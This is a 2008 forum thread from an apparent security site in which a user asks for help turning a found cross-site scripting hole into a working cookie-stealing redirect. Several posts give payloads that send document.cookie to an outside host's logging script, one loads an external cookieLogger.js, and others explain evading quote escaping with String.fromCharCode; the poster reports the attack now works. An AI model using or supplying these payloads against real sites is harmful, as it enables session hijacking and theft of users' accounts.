|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 83
Members: 0
Total: 83
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Cant redirect with my xss |
|
Posted: Fri Mar 21, 2008 12:50 am |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
Hi all,
I have found a XSS : Quote: | &div=%3Cscript%3Ealert(document.cookie)%3C/script%3E |
My php script works well when i test it, but the problem is that i cant redirect to my page with the xss.
i have test
Code: | &div=<script>document.location='http://site.com/cookie.php?cookie='+document.cookie;</script> |
Code: | &div=<script>window.location.replace('http://site.com/cookie.php?cookie='+document.cookie);</script> |
Actually, i think the problem comes from the ', it is replaced by \' . Is there a way to make it work? |
|
|
|
|
Posted: Fri Mar 21, 2008 1:05 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Maybe
<script>location.replace(\'http://site.com/cookie.php?cookie=\'+document.cookie)</script> |
|
|
|
|
Posted: Fri Mar 21, 2008 2:01 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Use javascript string manipulation functions. Example:
Code: |
String.fromCharCode(88,83,83)
|
... will produce string "XSS".
More ideas:
http://ha.ckers.org/xss.html
|
|
|
|
|
Posted: Fri Mar 21, 2008 10:18 am |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
|
|
|
|
|
Re: Cant redirect with my xss |
|
Posted: Fri Mar 21, 2008 12:30 pm |
|
|
Oilik |
Active user |
|
|
Joined: Mar 05, 2008 |
Posts: 35 |
|
|
|
|
|
|
|
Have you tried Code: |
&div=<script src=http://site.com/cookieLogger.js> |
and in http://site.com/cookieLogger.js, put Code: | document.location='http://site.com/logCookie.php?cookie=' + document.cookie; |
Edit:
gibbocool wrote: | Maybe
<script>location.replace(\'http://site.com/cookie.php?cookie=\'+document.cookie)</script> |
if the site is in PHP, wouldn't it just replace that string with:
Code: | <script>location.replace(\\\'http://site.com/cookie.php?cookie=\\\'+document.cookie)</script> |
?
That's happened to me a lot |
|
|
|
|
Posted: Fri Mar 21, 2008 12:45 pm |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
To avoid the \' you have to use String.fromCharCode(88,83 etc) like waraxe said.
Yeah it is working now ^^ When i use the String fonction, i didnt need the simple quote, without it is working ^^ |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|